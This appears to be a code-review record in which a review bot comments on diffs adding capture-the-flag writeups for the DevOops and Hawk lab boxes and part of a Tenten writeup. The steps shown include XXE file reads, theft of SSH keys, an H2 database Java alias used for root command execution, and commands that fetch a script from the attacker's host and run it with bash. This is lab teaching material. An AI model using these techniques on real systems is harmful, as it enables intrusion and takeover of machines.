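Review bot: The paragraph introducing the Gwolle Guestbook finding says WPScan flags it as "vulnerable to Cross Site Scripting", but the linked advisory (HTB23275) and the next paragraph describe a Remote File Inclusion through the abspath parameter of the frontend captcha ajaxresponse.php, and RFI is what is actually used to obtain the www-data shell; make the two consistent and fix "frontent" and "aforementionned". The step that triggers the RFI ("we can trigger a reverse shell ... with a simple curl command") shows the `locate`/`cp`/`nano`/SimpleHTTPServer preparation but never the curl request, and "We'll save the script locally, then use both python's SimpleHTTPServer with curl ..." is followed by nothing, so neither the user-shell nor the root-shell step can be followed from the markdown (presumably screenshots that were not added). The one-liner version of 0xdf's script also drops the final `tail -f /var/backups/onuma_backup_error.txt`, which should be mentioned since the flag only appears in that log. Since the backuperer script is quoted in full, the root cause is visible and worth stating for readers: the archive is written by onuma into /var/tmp, then after `/bin/sleep 30` root extracts and `diff -r`s it, so anyone with onuma access can replace the archive in that window (here with a symlink to /root/root.txt) and the diff of a root-readable file is appended to onuma_backup_error.txt.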
diff --git a/Medium/28.md b/Medium/28.md
new file mode 100644
index 0000000..e667503
--- /dev/null
+++ b/Medium/28.md
@@ -0,0 +1,182 @@
+# DevOops Writeup
+
+
+
+## Introduction :
+
+DevOops is a Medium linux box released back in June 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -F 10.10.10.91 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-19 09:57 GMT
+ Nmap scan report for 10.10.10.91
+ Host is up (0.050s latency).
+ Not shown: 8318 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 5000/tcp open upnp
+
+ Nmap done: 1 IP address (1 host up) scanned in 5.09 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -sCV -p22,5000 10.10.10.91
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-19 09:57 GMT
+ Nmap scan report for 10.10.10.91
+ Host is up (0.039s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA)
+ | 256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA)
+ |_ 256 d5:2f:19:53:b2:8e:3a:4b:b3:dd:3c:1f:c0:37:0d:00 (ED25519)
+ 5000/tcp open http Gunicorn 19.7.1
+ |_http-server-header: gunicorn/19.7.1
+ |_http-title: Site doesn't have a title (text/html; charset=utf-8).
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 11.01 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 5000 running http Gunicorn 19 so let's investigate it with dirsearch:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → dirsearch -u http://10.10.10.91:5000/ -e txt,php,html,xml -x 403 -t 100
+
+
+` 
+
+Looks like we have a website in construction so let's check out /upload which is a webpage onto which we can upload xml files So just like for [Aragorg](19.html), we will try to do some XXE exploitation, by first trying to print out the /etc/passwd file:
+
+
+
+What we just did was creating an infected xml file, uploaded it, and intercepted the request with burpsuite, so that we can send it to the repeater (CTRL+R) and then modify it and send it repeatedly:
+
+
+
+And we get code execution ! we have been able to find the user "roosa" so let's try to print out her flag :
+
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now that we know we can print out roosa's files, let's print out her private ssh key (/home/roosa/.ssh/id_rsa):
+
+
+
+Then we basically save it locally, change it's permissions correctly, and log into the box as the user roosa via the ssh port that our nmap scan picked up earlier.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/DevOops]
+ → nano pkey
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/DevOops]
+ → chmod 600 pkey
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/DevOops]
+ → ssh -i pkey roosa@10.10.10.91
+ The authenticity of host '10.10.10.91 (10.10.10.91)' can't be established.
+ ECDSA key fingerprint is SHA256:hbD2D4PdnIVpAFHV8sSAbtM0IlTAIpYZ/nwspIdp4Vg.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.91' (ECDSA) to the list of known hosts.
+ Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 135 packages can be updated.
+ 60 updates are security updates.
+
+
+ The programs included with the Ubuntu system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
+ applicable law.
+
+ roosa@gitter:~$ uname -a
+ Linux gitter 4.13.0-37-generic #42~16.04.1-Ubuntu SMP Wed Mar 7 16:02:25 UTC 2018 i686 athlon i686 GNU/Linux
+
+
+From there we navigate around and we stumble upon an interesting directory /home/roosa/work/blogfeed which contains a .git folder for us to enumerate:
+
+
+ roosa@gitter:~$ ls
+ deploy Downloads Pictures service.sh user.txt
+ Desktop examples.desktop Public service.sh~ Videos
+ Documents Music run-blogfeed.sh Templates work
+ roosa@gitter:~$ cd work
+ roosa@gitter:~/work$ ls
+ blogfeed
+ roosa@gitter:~/work$ cd blogfeed
+ roosa@gitter:~/work/blogfeed$ ls
+ README.md resources run-gunicorn.sh src
+ roosa@gitter:~/work/blogfeed$ ls -lash
+ total 28K
+ 4.0K drwxrwx--- 5 roosa roosa 4.0K Mar 21 2018 .
+ 4.0K drwxrwxr-x 3 roosa roosa 4.0K Mar 21 2018 ..
+ 4.0K drwxrwx--- 8 roosa roosa 4.0K Mar 26 2018 .git
+ 4.0K -rw-rw---- 1 roosa roosa 104 Mar 19 2018 README.md
+ 4.0K drwxrwx--- 3 roosa roosa 4.0K Mar 19 2018 resources
+ 4.0K -rwxrw-r-- 1 roosa roosa 180 Mar 21 2018 run-gunicorn.sh
+ 4.0K drwxrwx--- 2 roosa roosa 4.0K Mar 26 2018 src
+
+
+Now let's get into the .git directory and see if we can print out the previous git commits just like on the [Canape box](25.html) but this time we specify the -p flag in order to list the changes under each commit:
+
+
+ roosa@gitter:~/work/blogfeed$ git log -p
+
+
+And right under commit **d387abf63e05c9628a59195cec9311751bdb283f** we see another private key for us to use :
+
+
+
+So we save the key locally , give it the proper permissions and use it to login as root via ssh onto the box :
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/DevOops]
+ → nano pkey_root
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/DevOops]
+ → chmod 600 pkey_root
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/DevOops]
+ → ssh -i pkey_root root@10.10.10.91
+ Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 135 packages can be updated.
+ 60 updates are security updates.
+
+ Last login: Mon Mar 26 06:23:48 2018 from 192.168.57.1
+ root@gitter:~# whoami
+ root
+ root@gitter:~# cat /root/root.txt
+ d4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag on the box.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
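Review bot: The XXE part of the DevOops section has no payload or request in the text: "What we just did was creating an infected xml file, uploaded it, and intercepted the request with burpsuite" describes a screenshot that is not in the file, as do the /etc/passwd readout, the user flag and the dump of /home/roosa/.ssh/id_rsa, so the writeup cannot be followed from the markdown alone; include at least the XML entity definition used and the relevant response excerpt as text. The `git log -p` output that exposes the second key under commit d387abf63e05c9628a59195cec9311751bdb283f is likewise missing. Since the point of Part 3 is that a key removed from the working tree is still recoverable from history (the `ls -lash` listing shows nothing sensitive, only the .git history does), it is worth spelling that lesson out rather than leaving it implicit. Minor: the link text "Aragorg" for 19.html looks like a typo for Aragog.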
diff --git a/Medium/29.md b/Medium/29.md
new file mode 100644
index 0000000..765472b
--- /dev/null
+++ b/Medium/29.md
@@ -0,0 +1,424 @@
+# Hawk Writeup
+
+
+
+## Introduction :
+
+Hawk is a Medium linux box released back in July 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~]
+ → nmap -F 10.10.10.102
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-19 21:56 GMT
+ Nmap scan report for 10.10.10.102
+ Host is up (0.076s latency).
+ Not shown: 97 closed ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds
+
+ λ nihilist [ 10.10.14.24/23 ] [~]
+ → nmap -sCV -p21,22,80 10.10.10.102
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-19 21:56 GMT
+ Nmap scan report for 10.10.10.102
+ Host is up (0.082s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 3.0.3
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ |_drwxr-xr-x 2 ftp ftp 4096 Jun 16 2018 messages
+ | ftp-syst:
+ | STAT:
+ | FTP server status:
+ | Connected to ::ffff:10.10.14.24
+ | Logged in as ftp
+ | TYPE: ASCII
+ | No session bandwidth limit
+ | Session timeout in seconds is 300
+ | Control connection is plain text
+ | Data connections will be plain text
+ | At session startup, client count was 4
+ | vsFTPd 3.0.3 - secure, fast, stable
+ |_End of status
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 e4:0c:cb:c5:a5:91:78:ea:54:96:af:4d:03:e4:fc:88 (RSA)
+ | 256 95:cb:f8:c7:35:5e:af:a9:44:8b:17:59:4d:db:5a:df (ECDSA)
+ |_ 256 4a:0b:2e:f7:1d:99:bc:c7:d3:0b:91:53:b9:3b:e2:79 (ED25519)
+ 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+ |_http-generator: Drupal 7 (http://drupal.org)
+ | http-robots.txt: 36 disallowed entries (15 shown)
+ | /includes/ /misc/ /modules/ /profiles/ /scripts/
+ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
+ | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
+ |_/LICENSE.txt /MAINTAINERS.txt
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ |_http-title: Welcome to 192.168.56.103 | 192.168.56.103
+ Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.51 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 running http with drupal 7 just like the box [Bastard](2.html) except that this time we are dealing with a linux box. Although our nmap scan also picked up port 21 ftp with anonymous login, so let's check it out first:
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~]
+ → ftp 10.10.10.102
+ Connected to 10.10.10.102.
+ 220 (vsFTPd 3.0.3)
+ Name (10.10.10.102:nihilist): anonymous
+ 230 Login successful.
+ Remote system type is UNIX.
+ Using binary mode to transfer files.
+ ftp> ls
+ 200 PORT command successful. Consider using PASV.
+ 150 Here comes the directory listing.
+ drwxr-xr-x 2 ftp ftp 4096 Jun 16 2018 messages
+ 226 Directory send OK.
+ ftp> cd messages
+ 250 Directory successfully changed.
+ ftp> ls
+ 200 PORT command successful. Consider using PASV.
+ 150 Here comes the directory listing.
+ 226 Directory send OK.
+ ftp> ls -lash
+ 200 PORT command successful. Consider using PASV.
+ 150 Here comes the directory listing.
+ drwxr-xr-x 2 ftp ftp 4096 Jun 16 2018 .
+ drwxr-xr-x 3 ftp ftp 4096 Jun 16 2018 ..
+ -rw-r--r-- 1 ftp ftp 240 Jun 16 2018 .drupal.txt.enc
+ 226 Directory send OK.
+ ftp> get .drupal.txt.enc
+ local: .drupal.txt.enc remote: .drupal.txt.enc
+ 200 PORT command successful. Consider using PASV.
+ 150 Opening BINARY mode data connection for .drupal.txt.enc (240 bytes).
+ 226 Transfer complete.
+ 240 bytes received in 0.00 secs (165.9880 kB/s)
+ ftp> exit
+ 221 Goodbye.
+
+ λ nihilist [ 10.10.14.24/23 ] [~]
+ → cd _HTB/Hawk && mv ../../.drupal.txt.enc .
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/Hawk]
+ → file .drupal.txt.enc
+ .drupal.txt.enc: openssl enc'd data with salted password, base64 encoded
+
+
+So we have a base64 encoded openssl encrypted string of data with salted password so let's first de-base64 it :
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/Hawk]
+ → cat .drupal.txt.enc| base64 -d > drupal.txt.enc
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/Hawk]
+ → file drupal.txt.enc
+ drupal.txt.enc: openssl enc'd data with salted password
+
+
+Now from there we can bruteforce this openssl salted file with a tool called "bruteforce-salted-openssl"
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/Hawk]
+ → bruteforce-salted-openssl -t 50 -f /usr/share/wordlists/rockyou.txt -d sha256 drupal.txt.enc -1
+ Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.
+
+ Tried passwords: 0
+ Tried passwords per second: -nan
+ Last tried password: purple
+
+ Password candidate: friends
+
+
+The result was instant , the password is friends, now using this we can decode the file, note that bruteforce-salted-openssl uses aec-256-cbc by default so we also know that it is the algorithm used to encrypt the file, so let's use it to decrypt it using the friends password :
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/Hawk]
+ → openssl aes-256-cbc -d -in drupal.txt.enc -out drupal.txt
+ enter aes-256-cbc decryption password:
+ *** WARNING : deprecated key derivation used.
+ Using -iter or -pbkdf2 would be better.
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/Hawk]
+ → ls
+ drupal.txt drupal.txt.enc
+
+ λ nihilist [ 10.10.14.24/23 ] [~/_HTB/Hawk]
+ → cat drupal.txt
+ Daniel,
+
+ Following the password for the portal:
+
+ PencilKeyboardScanner123
+
+ Please let us know when the portal is ready.
+
+ Kind Regards,
+
+ IT department
+
+
+And we have another password to use ! PencilKeyboardScanner123, now let's investigate the http port our nmap scan picked up earlier :
+
+
+
+And we are logged in as admin ! now let's enable php:
+
+ 
+
+And once we saved the configuration at the bottom, we head into Content > Add Content > Basic Page:
+
+
+
+Scroll down, clicking preview with a netcat listener on our port 9001:
+
+
+
+And we get a low privilege shell as www-data ! now let's see what we can do from there:
+
+
+ www-data@hawk:/var/www/html$ uname -a
+ uname -a
+ Linux hawk 4.15.0-23-generic #25-Ubuntu SMP Wed May 23 18:02:16 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+ www-data@hawk:/var/www/html$ ls -la
+ ls -la
+ total 296
+ drwxr-xr-x 9 root root 4096 Jun 11 2018 .
+ drwxr-xr-x 3 root root 4096 Jun 11 2018 ..
+ -rw-r--r-- 1 www-data www-data 6104 Jun 11 2018 .htaccess
+ -rwxr-x--- 1 www-data www-data 111859 Jun 11 2018 CHANGELOG.txt
+ -rwxr-x--- 1 www-data www-data 1481 Jun 11 2018 COPYRIGHT.txt
+ -rwxr-x--- 1 www-data www-data 1717 Jun 11 2018 INSTALL.mysql.txt
+ -rwxr-x--- 1 www-data www-data 1874 Jun 11 2018 INSTALL.pgsql.txt
+ -rwxr-x--- 1 www-data www-data 1298 Jun 11 2018 INSTALL.sqlite.txt
+ -rwxr-x--- 1 www-data www-data 17995 Jun 11 2018 INSTALL.txt
+ -rwxr-x--- 1 www-data www-data 18092 Jun 11 2018 LICENSE.txt
+ -rwxr-x--- 1 www-data www-data 8710 Jun 11 2018 MAINTAINERS.txt
+ -rwxr-x--- 1 www-data www-data 5382 Jun 11 2018 README.txt
+ -rwxr-x--- 1 www-data www-data 10123 Jun 11 2018 UPGRADE.txt
+ -rwxr-x--- 1 www-data www-data 6604 Jun 11 2018 authorize.php
+ -rwxr-x--- 1 www-data www-data 720 Jun 11 2018 cron.php
+ drwxr-x--- 4 www-data www-data 4096 Jun 11 2018 includes
+ -rwxr-x--- 1 www-data www-data 529 Jun 11 2018 index.php
+ -rwxr-x--- 1 www-data www-data 703 Jun 11 2018 install.php
+ drwxr-x--- 4 www-data www-data 4096 Jun 11 2018 misc
+ drwxr-x--- 42 www-data www-data 4096 Jun 11 2018 modules
+ drwxr-x--- 5 www-data www-data 4096 Jun 11 2018 profiles
+ -rwxr-x--- 1 www-data www-data 2189 Jun 11 2018 robots.txt
+ drwxr-x--- 2 www-data www-data 4096 Jun 11 2018 scripts
+ drwxr-x--- 4 www-data www-data 4096 Jun 11 2018 sites
+ drwxr-x--- 7 www-data www-data 4096 Jun 11 2018 themes
+ -rwxr-x--- 1 www-data www-data 19986 Jun 11 2018 update.php
+ -rwxr-x--- 1 www-data www-data 2200 Jun 11 2018 web.config
+ -rwxr-x--- 1 www-data www-data 417 Jun 11 2018 xmlrpc.php
+
+ www-data@hawk:/var/www/html/sites/default$ ls -lash /home
+ ls -lash /home
+ total 12K
+ 4.0K drwxr-xr-x 3 root root 4.0K Jun 16 2018 .
+ 4.0K drwxr-xr-x 23 root root 4.0K Jun 12 2018 ..
+ 4.0K drwxr-xr-x 5 daniel daniel 4.0K Jul 1 2018 daniel
+
+
+Here we see that the only user on this box is daniel. which we can also verify by printing out /etc/passwd to which we see that he can use python3, which will be handy to upgrade our shell to a TTY shell:
+
+
+ www-data@hawk:/var/www/html/sites/default$ cat /etc/passwd | grep daniel
+ cat /etc/passwd | grep daniel
+ daniel:x:1002:1005::/home/daniel:/usr/bin/python3
+
+
+Poking around with out low privilege shell we stumble upon /var/www/html/sites/default/settings.php which contains cleartext passwords :
+
+
+ www-data@hawk:/var/www/html$ cd sites
+ cd sites
+ www-data@hawk:/var/www/html/sites$ ls
+ ls
+ README.txt
+ all
+ default
+ example.sites.php
+ www-data@hawk:/var/www/html/sites$ cd default
+ cd default
+ www-data@hawk:/var/www/html/sites/default$ ls -lash
+ ls -lash
+ total 68K
+ 4.0K dr-xr-x--- 3 www-data www-data 4.0K Jun 11 2018 .
+ 4.0K drwxr-x--- 4 www-data www-data 4.0K Jun 11 2018 ..
+ 28K -rwxr-x--- 1 www-data www-data 26K Jun 11 2018 default.settings.php
+ 4.0K drwxrwxr-x 3 www-data www-data 4.0K Jun 11 2018 files
+ 28K -r--r--r-- 1 www-data www-data 26K Jun 11 2018 settings.php
+ www-data@hawk:/var/www/html/sites/default$ cat settings.php | grep pasword
+ cat settings.php | grep pasword
+ www-data@hawk:/var/www/html/sites/default$ egrep password settings.php
+ egrep password settings.php
+ * 'password' => 'password',
+ * username, password, host, and database name.
+ * 'password' => 'password',
+ * 'password' => 'password',
+ * 'password' => 'password',
+ * 'password' => 'password',
+ 'password' => 'drupal4hawk',
+ * by using the username and password variables. The proxy_user_agent variable
+ # $conf['proxy_password'] = '';
+
+
+And we have another password "drupal4hawk" ! Now let's ssh as daniel on the box and grab his flag :
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~]
+ → ssh daniel@10.10.10.102
+ The authenticity of host '10.10.10.102 (10.10.10.102)' can't be established.
+ ECDSA key fingerprint is SHA256:ApgoV2acarN6BgPWgNLAt+2Hx2sO1pDqmhmetmW6pvk.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.102' (ECDSA) to the list of known hosts.
+ daniel@10.10.10.102's password:
+ Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-23-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Fri Mar 20 07:40:46 UTC 2020
+
+ System load: 0.0 Processes: 109
+ Usage of /: 54.1% of 9.78GB Users logged in: 0
+ Memory usage: 47% IP address for ens33: 10.10.10.102
+ Swap usage: 0%
+
+
+ * Canonical Livepatch is available for installation.
+ - Reduce system reboots and improve kernel security. Activate at:
+ https://ubuntu.com/livepatch
+
+ 55 packages can be updated.
+ 3 updates are security updates.
+
+
+ Last login: Sun Jul 1 13:46:16 2018 from dead:beef:2::1004
+ Python 3.6.5 (default, Apr 1 2018, 05:46:30)
+ [GCC 7.3.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>>
+
+
+Now as we predicted earlier, we are not dropped into a bash shell but in a python3 shell! python has libraries to spawn a tty shell for us which is fairly easy as you can see :
+
+
+ Last login: Sun Jul 1 13:46:16 2018 from dead:beef:2::1004
+ Python 3.6.5 (default, Apr 1 2018, 05:46:30)
+ [GCC 7.3.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> import pty
+ >>> pty.spawn("/bin/bash")
+ daniel@hawk:~$ ls
+ user.txt
+ daniel@hawk:~$ cat user.txt
+ d5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc to the root user we need to enumerate the box further, starting with particular proceses ran as root:
+
+
+ daniel@hawk:~$ ps auxw | grep java
+ root 807 0.0 0.0 4628 800 ? Ss Mar19 0:00 /bin/sh -c /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar
+ root 808 0.0 5.1 2329256 50836 ? Sl Mar19 0:31 /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar
+ daniel 17511 0.0 0.1 13136 1064 pts/1 S+ 07:43 0:00 grep java
+
+
+That's a H2 database running which our nmap scan didn't pick up earlier. so let's run another, more complete nmap scan to pick up which port the H2 database is running on :
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~]
+ → nmap -F 10.10.10.102 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 07:45 GMT
+ Nmap scan report for 10.10.10.102
+ Host is up (0.078s latency).
+ Not shown: 8314 closed ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 22/tcp open ssh
+ 80/tcp open http
+ 5435/tcp open sceanics
+ 8082/tcp open blackice-alerts
+ 9092/tcp open XmlIpcRegSvc
+
+ Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds
+
+
+Let's investigate our 3 new ports 9092 8082 and 5435 :
+
+
+ λ nihilist [ 10.10.14.24/23 ] [~]
+ → nmap -sCV -p5435,8082,9092 10.10.10.102
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 07:46 GMT
+ Nmap scan report for 10.10.10.102
+ Host is up (0.078s latency).
+
+ PORT STATE SERVICE VERSION
+ 5435/tcp open tcpwrapped
+ 8082/tcp open http H2 database http console
+ |_http-title: H2 Console
+ 9092/tcp open XmlIpcRegSvc?
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port9092-TCP:V=7.80%I=7%D=3/20%Time=5E7474DD%P=x86_64-pc-linux-gnu%r(NU
+ SF:LL,45E
+
+
+And here we see that the H2 database is running on port 8082 However we see that remote connections to it are disabled so we bypass that by creating a ssh tunnel from it's remote port 8080 to our local port 8082 :
+
+
+
+No need to login we can just change the JDBC URL to /root to gain access to the console :
+
+
+
+And from there we can abuse the H2 DB ALIAS to privesc to the root user with this java one liner :
+
+
+ CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;
+
+
+` 
+
+Now when we run the command "id" we see that we get command execution as root!
+
+
+
+Now from there we just need to get a reverse shell as the root user, and to do so we ready our reverse shell one liner with python's SimpleHTTPServer module on port 8999, along with our netcat listener on port 9001, But we need to check if wget is on the box :
+
+
+
+And wget is on the box ! but if we type in 'which curl' we see that curl is also there on the box, so we could potentially print out the contents of our exploit, and pipe it into bash to get our reverse shell, but that's not the case here, because we cannot use each one of our special characters such as && or | or > therefore we have to execute each command in the following order :
+
+
+ call SHELLEXEC('wget http://10.10.14.24:8999/nihilist.sh')
+ call SHELLEXEC('chmod +x nihilist.sh')
+ call SHELLEXEC('bash nihilist.sh')
+
+
+` 
+
+And that's it ! We have been able to get a reverse shell as root and print the flag !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
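Review bot: the tunnel sentence `And here we see that the H2 database is running on port 8082 However we see that remote connections to it are disabled so we bypass that by creating a ssh tunnel from it's remote port 8080 to our local port 8082` contradicts the scan just above it (`8082/tcp open http H2 database http console`): the console was found on 8082, so the "remote port 8080" looks wrong, and the actual `ssh -L` command that the following steps depend on is never shown; add the command, and change "it's" to "its". The two bare "`" lines after the CREATE ALIAS statement and after the three `call SHELLEXEC(...)` lines look like leftover image-embed markup (the other files in this commit use `![]()`) and will render as stray backticks. The nmap fingerprint is cut off at `SF:LL,45E`; either include it whole or drop it, since a truncated fingerprint is not useful to the reader. Finally, "we cannot use each one of our special characters such as && or | or >" deserves its reason: the alias hands the string to `Runtime.getRuntime().exec(cmd)`, which runs the program directly rather than through a shell, so shell operators are never interpreted. That is also the defender-relevant takeaway worth one sentence here: an H2 web console that is reachable (even only via a tunnel) and lets a user define a Java alias is a root command-execution primitive, so the console should be disabled or bound to an authenticated, non-root service.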
diff --git a/Medium/3.md b/Medium/3.md
new file mode 100644
index 0000000..33fbc62
--- /dev/null
+++ b/Medium/3.md
@@ -0,0 +1,374 @@
+# Tenten Writeup
+
+
+
+## Introduction :
+
+Tenten is a medium linux box released back in March 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → nmap -F 10.10.10.10
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 15:20 GMT
+ Nmap scan report for 10.10.10.10
+ Host is up (0.100s latency).
+ Not shown: 98 filtered ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 3.36 seconds
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → nmap -sCV -p22,80 10.10.10.10
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 15:21 GMT
+ Nmap scan report for 10.10.10.10
+ Host is up (0.10s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
+ | 256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
+ |_ 256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-generator: WordPress 4.7.3
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Job Portal - Just another WordPress site
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up wordpress running on port 80 : let's run WPScan to enumerate it further :
+
+
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → wpscan --url http://10.10.10.10/ -e
+ _______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.7.8
+ Sponsored by Automattic - https://automattic.com/
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+ _______________________________________________________________
+
+ [+] URL: http://10.10.10.10/
+ [+] Started: Fri Feb 21 15:25:37 2020
+
+ Interesting Finding(s):
+
+ [+] http://10.10.10.10/
+ | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
+ | Found By: Headers (Passive Detection)
+ | Confidence: 100%
+
+ [+] http://10.10.10.10/xmlrpc.php
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+ | References:
+ | - http://codex.wordpress.org/XML-RPC_Pingback_API
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
+ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
+
+ [+] http://10.10.10.10/readme.html
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+
